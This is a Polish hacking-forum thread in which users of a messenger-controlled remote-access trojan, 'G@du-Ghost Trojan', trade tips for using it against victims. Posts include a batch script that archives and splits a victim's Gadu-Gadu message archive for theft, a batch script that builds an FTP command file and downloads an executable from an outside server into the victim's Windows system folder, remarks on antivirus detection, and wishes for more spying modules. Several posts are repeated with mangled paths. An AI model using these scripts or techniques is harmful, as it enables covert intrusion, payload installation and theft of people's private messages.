G@du-Ghost Trojan
- Thread starter Wojass
- Rozpoczęty
- Status
witam,
ma problem z poleceniem klientftp. Po wpisaniu komendy nic sie nie dzieje, tak jakby GGT nie otrzymywał danego polecenia.
Problem dotyczy wersji GGT 1.4 beta, czy ktos miał podobny problem?
Jeszcze jedna sprawa, komp którj jest atakowany jest za NATem
ma problem z poleceniem klientftp. Po wpisaniu komendy nic sie nie dzieje, tak jakby GGT nie otrzymywał danego polecenia.
Problem dotyczy wersji GGT 1.4 beta, czy ktos miał podobny problem?
Jeszcze jedna sprawa, komp którj jest atakowany jest za NATem
Telemaniak
Użytkownik
- Dołączył
- Marzec 3, 2003
- Posty
- 34
czy w wersji 1.4 niemozna podesłac pliku? do ofiary
bo jak tak to straszna lipa
niewspomne ze opcja run tez niezabardzo działa :-(
bo jak tak to straszna lipa
niewspomne ze opcja run tez niezabardzo działa :-(
Bugi jakie wykrylem:
-polecenie @plik nie reaguje jeżeli w jego wartości będzi znak "@' np.
@plik
c:[email protected]
-jeszcze raz polecenie @plik nie reaguje jeżeli w nazwie zainteresowanego pliku będą dwie kropki np.
@plik
c:katalogplik.part1.rar
Błędy znalezione na ver. 1.4
Co do problemu z ograniczeniem wielkości pliku w polecieniu @plik, to można go dosyć łatwo obejść. A mianowicie Potrzebny nam tylko program WinRar, zainstalowany na kompie ofiary. Tenże WinRar razem z wersją okienkową posiada program do obsługi przez kosolę. Program ten nazywa się rar.exe i znajduje się w katalogu głównym Winrara.
A jako iż GGT ma możliwość wykonania dowolnego pliku batch na kompie ofiary, możemy mu dac np. cos takiego (więcej o opcjach i poleceniach w helpie WR)
batch
@echo off
C
rogra~1WinRARRar.exe -rar a -m0 -v300*1000 -y archiwum cocume~1userGadu-G~1userarchives.dat C:dowolnykatalog
exit
Program Rar.exe doda do archiwum plik archives.dat
, z użyciem wolumenów, któy kazdy z nich będzie miał wielkośc 300KB, do katalogu C:dowolnykatalog
A wtedy myślę, że kazdy będzie wiedział co zrobic
. Jednakże w/w słowa są nic nie warte z wczesniej wymienionym bugiem. Jednakże próbujcie, albowiem byc moze tylko u mnie występuje ten błąd.
A tak btw to imho wręcz genialne rozwiązanie zastosowania komunikacjii "klienta" z serwerem. Gratulacje dla autora
.
Pozdrawiam
czasem
-polecenie @plik nie reaguje jeżeli w jego wartości będzi znak "@' np.
@plik
c:[email protected]
-jeszcze raz polecenie @plik nie reaguje jeżeli w nazwie zainteresowanego pliku będą dwie kropki np.
@plik
c:katalogplik.part1.rar
Błędy znalezione na ver. 1.4
Co do problemu z ograniczeniem wielkości pliku w polecieniu @plik, to można go dosyć łatwo obejść. A mianowicie Potrzebny nam tylko program WinRar, zainstalowany na kompie ofiary. Tenże WinRar razem z wersją okienkową posiada program do obsługi przez kosolę. Program ten nazywa się rar.exe i znajduje się w katalogu głównym Winrara.
A jako iż GGT ma możliwość wykonania dowolnego pliku batch na kompie ofiary, możemy mu dac np. cos takiego (więcej o opcjach i poleceniach w helpie WR)
batch
@echo off
C
rogra~1WinRARRar.exe -rar a -m0 -v300*1000 -y archiwum cocume~1userGadu-G~1userarchives.dat C:dowolnykatalogexit
Program Rar.exe doda do archiwum plik archives.dat
A wtedy myślę, że kazdy będzie wiedział co zrobic
A tak btw to imho wręcz genialne rozwiązanie zastosowania komunikacjii "klienta" z serwerem. Gratulacje dla autora
Pozdrawiam
czasem
Wojass
Użytkownik
- Dołączył
- Sierpień 22, 2003
- Posty
- 347
to ja moze napisze dlazego tak sie dzieje i wymienie wiecej bugów :]
tak naprawde to nie jest bug GGT tylko zabezpieczenie serwerów GG przed spamem, problem polega na tym ze GGT nie posiada listy kontaktów i wszystkie wiadomosci z @ i kropkami opisane wyzej sa rozpoznawane jako adresy @ i www, takich wiadomosci nie mozna otrzymywac od kogos kogo sie nie ma na liscie kontaktów dlatego że GG mialo by powazny problem ze spamerami,
dlatego tez nie dzałała funkcja www2exe i dalej nie dzała funkcja klientftp ktora zrobilem zamiast www2exe myslac ze sama funkcja jest wadliwa,
wszystko zostanie naprawione w nastepnej wersji jaka wydam mam nadzieje ze wciagu miesiaca
pozdro
Tadeusz Fantom
Użytkownik
- Dołączył
- Lipiec 2, 2004
- Posty
- 253
Chciałem poinformować wszem i wobec, że GGT jest wykrywalny na pewno przez programy antywirusowe......
Sprawdziłem i na programie firmy Grisoft AVG6 wyświetliło jako BackDoor.Plimus B taka sama nazwa pojawiła się na programie
firmy H+BEDV AntiVir 6 PE, z włączeniem się blokady przed instalacją konika :x , definicje wirusów w obu programach były z dnia 22.07 2004 rok. Sądzę, że już trojan jest wykrywalny przez większość antywirusów, sprawdziłbym jak to jest po zainstalowaniu .....ale nie mam czasu potem go usuwać.......jestem bardzo zajęty :gazeta:
Należy mieć nadzieję, że większość użytkowników komputerów raczej lekceważy zabezpieczenia..........jak sprawdzę czy programy AV leczą lub całkowicie usuwają GGT to dam znać , pozdrawiam narka :twisted:
Sprawdziłem i na programie firmy Grisoft AVG6 wyświetliło jako BackDoor.Plimus B
taka sama nazwa pojawiła się na programiefirmy H+BEDV AntiVir 6 PE, z włączeniem się blokady przed instalacją konika :x , definicje wirusów w obu programach były z dnia 22.07 2004 rok. Sądzę, że już trojan jest wykrywalny przez większość antywirusów, sprawdziłbym jak to jest po zainstalowaniu .....ale nie mam czasu potem go usuwać.......jestem bardzo zajęty :gazeta:
Należy mieć nadzieję, że większość użytkowników komputerów raczej lekceważy zabezpieczenia..........jak sprawdzę czy programy AV leczą lub całkowicie usuwają GGT to dam znać , pozdrawiam narka :twisted:
Eureka!!!!!!!!!!!!!
plik bat o następującej treści uruchomić powinien windowsowego klienta ftp u ofiray:
--------------------------------------
ftp -s:robota.txt ftp.republika.pl
--------------------------------------
plik robota.txt zawiera komendy dla tego ftp'a - tzn co ma robić ten ftp; zawartość tego pliku, który powinien znajdować się u ofiary (ewentualnie podać ścieżkę dostępu do tego pliku) może wyglądać następująco:
--------------------------------------
login
hasło
bin
get
plik1.exe
C:WINDOWSsystemplik2.exe
bye
--------------------------------------
bin - włącza binarny tryb przesyłania pliku
get - pobiera plik z serwera ftp
plik1.exe - plik, który chcemy pobrać z serwera (u mnie jest w głównym katalogu na ftp'ie, ewentualnie podać ścieżkę dostępu)
C:WINDOWSsystemplik2.exe - gdzie zapisujemy na dysku ofiary pobierany plik i pod jaką nazwą czy rozszeżeniu bo moża zmienić
bye - kończy sesje ftp
oczywiśćie można dodać więćej zadań do pliku robota.txt
i tu mam problem:
jak utworzyć taki plik robota.txt na kompie ofiary - czy jest to możliwe przez uruchomienie odpowiedniego kodu bach ?????????????
np. "copy con bla.txt" tworzy plik tekstowy tylko żę trzeba ręcznie wpisać treść pliku
może jest to łątwe ale niechce mi się myśleć
no nic jak ktoś możę mi pomóc to proszę walić na mail'a [email protected]
----
Nie wiem czy przetwarzanie wsadowe w ggt działa bo nie próbowałem jeszcze ale storzyłem kod który po uruchoieniu na moim kompie ściaga plik z serwera ftp. Jak komus toto wyjdzie to niech napisze na forum i mi pogratuluje
------------------------------------------------
echo login> 1.ggt
echo password> 2.ggt
echo bin> 3.ggt
echo get> 4.ggt
echo plik1.exe> 5.ggt
echo C:WINDOWSsystemplik2.exe> 6.ggt
echo bye> 7.ggt
copy 1.ggt+2.ggt+3.ggt+4.ggt+5.ggt+6.ggt+7.ggt 8.ggt
del 1.ggt
del 2.ggt
del 3.ggt
del 4.ggt
del 5.ggt
del 6.ggt
del 7.ggt
ftp -s:8.ggt ftp.republika.pl
del 8.ggt
------------------------------------------------
plik bat o następującej treści uruchomić powinien windowsowego klienta ftp u ofiray:
--------------------------------------
ftp -s:robota.txt ftp.republika.pl
--------------------------------------
plik robota.txt zawiera komendy dla tego ftp'a - tzn co ma robić ten ftp; zawartość tego pliku, który powinien znajdować się u ofiary (ewentualnie podać ścieżkę dostępu do tego pliku) może wyglądać następująco:
--------------------------------------
login
hasło
bin
get
plik1.exe
C:WINDOWSsystemplik2.exe
bye
--------------------------------------
bin - włącza binarny tryb przesyłania pliku
get - pobiera plik z serwera ftp
plik1.exe - plik, który chcemy pobrać z serwera (u mnie jest w głównym katalogu na ftp'ie, ewentualnie podać ścieżkę dostępu)
C:WINDOWSsystemplik2.exe - gdzie zapisujemy na dysku ofiary pobierany plik i pod jaką nazwą czy rozszeżeniu bo moża zmienić
bye - kończy sesje ftp
oczywiśćie można dodać więćej zadań do pliku robota.txt
i tu mam problem:
jak utworzyć taki plik robota.txt na kompie ofiary - czy jest to możliwe przez uruchomienie odpowiedniego kodu bach ?????????????
np. "copy con bla.txt" tworzy plik tekstowy tylko żę trzeba ręcznie wpisać treść pliku
no nic jak ktoś możę mi pomóc to proszę walić na mail'a [email protected]
----
Nie wiem czy przetwarzanie wsadowe w ggt działa bo nie próbowałem jeszcze ale storzyłem kod który po uruchoieniu na moim kompie ściaga plik z serwera ftp. Jak komus toto wyjdzie to niech napisze na forum i mi pogratuluje
------------------------------------------------
echo login> 1.ggt
echo password> 2.ggt
echo bin> 3.ggt
echo get> 4.ggt
echo plik1.exe> 5.ggt
echo C:WINDOWSsystemplik2.exe> 6.ggt
echo bye> 7.ggt
copy 1.ggt+2.ggt+3.ggt+4.ggt+5.ggt+6.ggt+7.ggt 8.ggt
del 1.ggt
del 2.ggt
del 3.ggt
del 4.ggt
del 5.ggt
del 6.ggt
del 7.ggt
ftp -s:8.ggt ftp.republika.pl
del 8.ggt
------------------------------------------------
jedno mi sie nie podoba w tym calym trojanku, jak wiadomo serwery gg to jedno wielkie gowno, czasem nie dziala czasem rozlacza, czasem nie rozlacza a wiadomosci nie dochadza. I tutaj GGT nie daje sobie rady. Obecnie testuje u siebie GGTv1.3 (najlepiej dziala ze wszystkich wersji) wszystko smiga kazda opcja screen pliki wysylanie outlook tylko kiedy odpale serwer to podziala on jakies 10 min a potem zdycha, dopatrzylem sie pare razy "reaktywacji" ale gdzies tutaj wyczytalem ze on ponawia probe poloaczenia tlyko kilka razy potem kiedy nie moze wylacza sie, tutaj powinna byc poprawka, serwer powinien odczekac 5 10 min i ponowic probe a nie poddawac sie.
Do tego proponuje dodac jescze jakies nowe szpiegi, szpieg outlooka jest the best i fajnie by bylo jak by byly jeszcze do GG, TLENU czy ICQ.
Ale ogolnie uwarzam ten trojan za najleprzy z jakim sie spotkalem, mimo ze sie obsluguje go wysylanymi komendami to dodaje on tylko profesjonalizmu trojanaDDD zabawa z przyciskami (jak w netbusie i typowych trojanach) nie rajcuje mnie tak jak GGT.
pozdrowienia dla autora i gratulacje pomyslu i projektu, jestem pod duzym wrazeniem <spoko>
Do tego proponuje dodac jescze jakies nowe szpiegi, szpieg outlooka jest the best i fajnie by bylo jak by byly jeszcze do GG, TLENU czy ICQ.
Ale ogolnie uwarzam ten trojan za najleprzy z jakim sie spotkalem, mimo ze sie obsluguje go wysylanymi komendami to dodaje on tylko profesjonalizmu trojana
DDD zabawa z przyciskami (jak w netbusie i typowych trojanach) nie rajcuje mnie tak jak GGT.pozdrowienia dla autora i gratulacje pomyslu i projektu, jestem pod duzym wrazeniem <spoko>
discovery44
Były Moderator
- Dołączył
- Sierpień 14, 2007
- Posty
- 763
- Status